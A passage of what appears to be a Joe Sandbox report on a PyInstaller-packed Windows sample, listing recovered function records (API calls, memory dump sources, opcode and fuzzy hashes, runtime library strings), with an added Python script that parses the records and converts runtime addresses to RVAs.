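Each record above describes one function Joe Sandbox recovered from a memory dump: the Python C-API exports it calls (PyThread_acquire_lock, PyEval_SaveThread/RestoreThread, PyErr_SetString, and the calls made inside a subcall at 00007FFBBB60857C), the runtime address of each call site, the dump region the code came from, and the base the dump is "based on PE" at (the Offset field). Those addresses are the ASLR-relocated runtime addresses of this particular run; to find the same function in a static copy of the module, or to compare against another analysis, you subtract the base and work with RVAs. The error strings carried by these records ("Compressor has been flushed", "Repeated call to flush()", "Already at end of stream") are ones CPython's own compression extension modules raise, which suggests these functions are interpreter library code bundled by PyInstaller rather than the payload, so rebasing and grouping them quickly shows which dump regions merit a closer look. The parser below is an added example, not part of the Joe Sandbox report or its tooling; its sample input is a trimmed copy of the record above, and the field and function names (`base`, `rva`, `rebased_calls`, `imports_by_module`) are this script's own. It takes Offset as the module's load base, which is an assumption about the report format.

```python
"""Parse Joe Sandbox disassembly records into structured, rebased data.

Added example; not part of the Joe Sandbox report or of its tooling. The
sample text is copied from the function record above. Field and function
names (`base`, `rva`, `rebased_calls`, ...) are this script's own.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: a trimmed copy of the record above (the long
# "Associated" list is cut to one entry; the text is otherwise verbatim).
SAMPLE = """\
APIs
• PyThread_acquire_lock.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB609046
• PyThread_release_lock.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB609078
• PyErr_SetString.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB6090A8
  • Part of subcall function 00007FFBBB60857C: PyType_GetModuleState.PYTHON313 ref: 00007FFBBB6085B5
  • Part of subcall function 00007FFBBB60857C: PyBytes_FromStringAndSize.PYTHON313 ref: 00007FFBBB6085C9
• PyEval_SaveThread.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB6148A2
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• String ID: Compressor has been flushed
• Opcode ID: 93de4d5cb0508ffd5a7dfeffd0af339d395ad221db97f1efa8aca5c53164853c
"""

HEX16 = r"[0-9A-Fa-f]{16}"
# Direct call:  "<api>.<module>(args), ref: <addr>"
# Subcall:      "Part of subcall function <callee>: <api>.<module> ref: <addr>"
API_RE = re.compile(
    rf"(?:Part of subcall function (?P<callee>{HEX16}): )?"
    rf"(?P<api>\w+)\.(?P<module>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>{HEX16})"
)
# Offset is taken as the module load base (assumption about the report format).
SOURCE_RE = re.compile(rf"Source File:\s*(?P<dump>\S+\.sdmp).*Offset:\s*(?P<base>{HEX16})")
KV_RE = re.compile(r"•\s*(String ID|Opcode ID):\s*(.*)")


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                      # runtime address of the call site
    callee: Optional[int] = None  # runtime address of the subcall this site belongs to


@dataclass
class FunctionRecord:
    dump: str = ""
    base: int = 0                 # module base ("Offset") the dump was carved from
    string_id: str = ""
    opcode_id: str = ""
    calls: list[ApiCall] = field(default_factory=list)

    def rva(self, addr: int) -> int:
        """Runtime address -> RVA, usable against a static copy of the module."""
        return addr - self.base


def parse_records(text: str) -> list[FunctionRecord]:
    """Walk the report text; every 'APIs' header opens a new function record."""
    records: list[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        if m := API_RE.search(line):
            cur.calls.append(ApiCall(m["api"], m["module"], int(m["ref"], 16),
                                     int(m["callee"], 16) if m["callee"] else None))
        elif m := SOURCE_RE.search(line):
            cur.dump, cur.base = m["dump"], int(m["base"], 16)
        elif m := KV_RE.match(line):
            setattr(cur, m[1].lower().replace(" ", "_"), m[2].strip())
    return records


def rebased_calls(rec: FunctionRecord) -> list[tuple[str, int, Optional[int]]]:
    """(api, call-site RVA, callee RVA or None) for every call in the record."""
    return [(c.api, rec.rva(c.ref), rec.rva(c.callee) if c.callee is not None else None)
            for c in rec.calls]


def imports_by_module(records: list[FunctionRecord]) -> dict[str, set[str]]:
    """Which exports of which DLL the recovered functions call, across all records."""
    out: dict[str, set[str]] = {}
    for rec in records:
        for c in rec.calls:
            out.setdefault(c.module, set()).add(c.api)
    return out


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(f"base={rec.base:#x} dump={rec.dump} string={rec.string_id!r}")
        for api, site, callee in rebased_calls(rec):
            where = f"in subcall {callee:#x}" if callee is not None else "direct"
            print(f"  {site:#08x}  {api:<28} {where}")
```

Paste a whole report section into `parse_records` to get one record per function; the RVAs it returns (0x9046, 0x85B5, ...) are what you look up in a disassembler loaded with a static copy of the module, for instance the file extracted from the PyInstaller bundle, and `imports_by_module` gives a quick view of which runtime DLLs the carved functions depend on.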
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Eval_Thread$RestoreSaveStringThread_acquire_lock$Bytes_Err_FromList_SizeThread_release_lock
                                                                                                                                                                                                      • String ID: Repeated call to flush()
                                                                                                                                                                                                      • API String ID: 3236580226-194442007
                                                                                                                                                                                                      • Opcode ID: 4754abb13fe3894e29a333388fa33b4ce1169a5a9ba9414d824f219d6c87b798
                                                                                                                                                                                                      • Instruction ID: 70e1ac97832c6f4194bd4b3c8a52a44a19c16def8a3b7787497689a028e51043
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4754abb13fe3894e29a333388fa33b4ce1169a5a9ba9414d824f219d6c87b798
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A11F8B2A08A4292EA109B2EE944679A261FB88B84F048031DF0F47A74CF2DE856C704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Eval_Thread$RestoreSaveStringThread_acquire_lock$Bytes_Err_FromList_ModuleSizeStateThread_release_lockType_
                                                                                                                                                                                                      • String ID: Repeated call to flush()
                                                                                                                                                                                                      • API String ID: 3871537485-194442007
                                                                                                                                                                                                      • Opcode ID: 846ad34fc956f2d8cc9539ebd28b4008fa9c7d7d9fbee7c40b9c9ffed26adc9f
                                                                                                                                                                                                      • Instruction ID: ee734eb42d5355c8bed396eda328d075a52b31ff8c520109d412ff9c122846d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 846ad34fc956f2d8cc9539ebd28b4008fa9c7d7d9fbee7c40b9c9ffed26adc9f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E21116A1A08A5282E7589B3AEC44379B355FB84B80F04D031DB0F47774CF2DE8558704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abort$AdjustPointer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1501936508-0
                                                                                                                                                                                                      • Opcode ID: a77e56ffb7347bb9ddddd1c8b20b2eb7c3ebdd653f05e7e8cd9cc1452737c897
                                                                                                                                                                                                      • Instruction ID: c49f71506ea875154692db7ad4ac15889588d8c2dd7cf7b8363c20368b8d99c1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a77e56ffb7347bb9ddddd1c8b20b2eb7c3ebdd653f05e7e8cd9cc1452737c897
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC51B1E9F0E68281FE65CB7DD04E6B867A4AF44F80F098539CB5E06794DF2CE8418708
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: abort$AdjustPointer
• String ID:
• API String ID: 1501936508-0
• Opcode ID: 4f4cdc7b1f5bc10ab634606701f5204aa77954bebd3c90e9ebba0e05a3be14f8
• Instruction ID: 729cfe7deae3e1cd455653c97364a7b633b2ab5df8a6d0fdb2c35fd945276292
• Opcode Fuzzy Hash: 4f4cdc7b1f5bc10ab634606701f5204aa77954bebd3c90e9ebba0e05a3be14f8
• Instruction Fuzzy Hash: FC518FE9B0AA4281FE65DB3DD44E6787395AF44F84F0A8439CB4E06B95DF2CE841C309
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Arg_BufferBuffer_Err_IndexKeywordsLong_Number_Object_OccurredReleaseSsize_tUnpackmemset
• String ID:
• API String ID: 606573005-0
• Opcode ID: a324398e3bede2699f5ce2eec0847bfe6a28e1d246fcab0b9eaa74794024205a
• Instruction ID: 005994924621d5555b661d515665c1c16f8fad66d391ef3dbeb59d44305e8f66
• Opcode Fuzzy Hash: a324398e3bede2699f5ce2eec0847bfe6a28e1d246fcab0b9eaa74794024205a
• Instruction Fuzzy Hash: F541A5A1A08B4286EE54CF2AE880379B350FB58B90F84C130DF5E037A5EF3CD845C648
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
• Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
Similarity
• API ID: Arg_BufferBuffer_IndexKeywordsLong_Number_Object_ReleaseSsize_tUnpackmemset
• String ID:
• API String ID: 1047613875-0
• Opcode ID: 50970edf94aab080e00a017c8fdbf5507f53e9c43653c6ce39d107284c02803c
• Instruction ID: 004f7e4e262923104d603fcb40b5bb10113de0e7f1060546d1f92a025e6f18e3
• Opcode Fuzzy Hash: 50970edf94aab080e00a017c8fdbf5507f53e9c43653c6ce39d107284c02803c
• Instruction Fuzzy Hash: 434183A3A19B5296EA119F2EEC44679A2A0FB49BD0F448131DF5E07BA4EF3CDC45C704
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: FileHeader$ExceptionRaise
• String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
• API String ID: 3685223789-928371585
• Opcode ID: 4f73c46b7be505823b8c23bdf2e01a106e3a134808b8006f3c7a9710838bb3a8
• Instruction ID: e0092892d939752f0e81f1d4de5c26a20401f8c06c28e66e6befe15a9ecd22aa
• Opcode Fuzzy Hash: 4f73c46b7be505823b8c23bdf2e01a106e3a134808b8006f3c7a9710838bb3a8
• Instruction Fuzzy Hash: 4051B2EAB19A4693DE20CB38E4A95B96360FF44B84F508436DB8D07764EF3CE585C704
APIs
• PyType_GetModuleState.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB60839D
• PyBytes_FromStringAndSize.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB6083BB
• PyList_New.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB6083D1
• PyEval_SaveThread.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB60840E
• PyEval_RestoreThread.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB608427
• _Py_Dealloc.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB6084EC
• _Py_Dealloc.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB6146C2
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: DeallocEval_Thread$Bytes_FromList_ModuleRestoreSaveSizeStateStringType_
• String ID:
• API String ID: 2831925710-0
• Opcode ID: 16fbac790653686bbe248a4dcbfb097c7ce403cfd3436c25cc9141e3a4c4f252
• Instruction ID: 14fe3315cea6b60441324f4591efc899307fc2f873b25dc65b5ec4b63a5ddf61
• Opcode Fuzzy Hash: 16fbac790653686bbe248a4dcbfb097c7ce403cfd3436c25cc9141e3a4c4f252
• Instruction Fuzzy Hash: AC5174B3A0871185EA60DB2AE884579B394FB44754F598235DF5E433A0DF3CDC45C308
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: Name::operator+
• String ID: {for
• API String ID: 2943138195-864106941
• Opcode ID: c8c0eb25e8b680b21b04dbc78bc85cadbb1d2f305e65e2eabc9fe04fafa5b067
• Instruction ID: 376d3c8be2d0d8e8f8de36bb27b9fafe56b62a7bcc696eb32867fd22fe506c01
• Opcode Fuzzy Hash: c8c0eb25e8b680b21b04dbc78bc85cadbb1d2f305e65e2eabc9fe04fafa5b067
• Instruction Fuzzy Hash: 5F5115F6B08A85A9FB01DF38D4483A833A1EB45748F848031EB4D47A99DF78D555C718
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: DeallocEval_Thread$Bytes_FromList_ModuleRestoreSaveSizeStateStringType_
• String ID:
• API String ID: 2831925710-0
• Opcode ID: b56d12ae4060c59d5afa07068ebeba48d0cc5cea2c731143b3892cc892e1be47
• Instruction ID: eb316a00948d45ce5feeb5ac02177c4ed87dcb4096bc4fb5c6344c98eddb8a6a
• Opcode Fuzzy Hash: b56d12ae4060c59d5afa07068ebeba48d0cc5cea2c731143b3892cc892e1be47
• Instruction Fuzzy Hash: 395196A2A19B4285EE648B3ADD54139B3A0FB49B60F599235DF5E037A0DF3CEC50C704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dealloc$Bytes_FromSizeStringmemcpy
                                                                                                                                                                                                      • String ID: Unable to allocate output buffer.
                                                                                                                                                                                                      • API String ID: 76732796-2565006440
                                                                                                                                                                                                      • Opcode ID: a4c92701f9ed141fd0d8f748463699b631f7ae9b4821ca4873bd1ff5d75ee438
                                                                                                                                                                                                      • Instruction ID: ad46654b589242d799433c9a9ddab3cbfea5f3b14a98a3249eb46da5aa00c3fa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4c92701f9ed141fd0d8f748463699b631f7ae9b4821ca4873bd1ff5d75ee438
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0541EAB3A19A0281EB598F2ED940269A7A0FB48F94F189432DF1F477A5DF7CD891C704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameName::atol
                                                                                                                                                                                                      • String ID: `template-parameter$void
                                                                                                                                                                                                      • API String ID: 2130343216-4057429177
                                                                                                                                                                                                      • Opcode ID: 39600c2fadeceed4c6c28385a1cdb72227216fd67de7d66948b2e2ddd060d726
                                                                                                                                                                                                      • Instruction ID: 368e71291f6872c69fec9b51283af56fc5b3ede9056ad3dda157c157a3aa7b7a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39600c2fadeceed4c6c28385a1cdb72227216fd67de7d66948b2e2ddd060d726
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F4148EAB08B5288FB00CBB8D8592FD2371BF58B88F941135CF4D66659EF78A545C344
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDBD
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDCB
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDF5
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DE63
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DE6F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                      • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                      • Instruction ID: 034e6306d75accbdad8fbccfff273b72e78dc3c04545962a54b6a043a30d2287
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC316E21B1A68291EF52AB12A8005B5A7D4FF58BA0FD94635ED3D073D4EF3CE458C2A0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                      • API String ID: 2943138195-2211150622
                                                                                                                                                                                                      • Opcode ID: 8129fa0169d6cc1cc5ca1a8c8b43bbbd082598864b82464398da58a00a821778
                                                                                                                                                                                                      • Instruction ID: 02a78879a7a80cb59be2f3330ca9eccf81c3c36cfb716d3bd061b3417808413e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8129fa0169d6cc1cc5ca1a8c8b43bbbd082598864b82464398da58a00a821778
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 784115EAB08B8698F741CB7CD8482BC37A0BB04348F984535DB4C16394EF7CA946C708
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
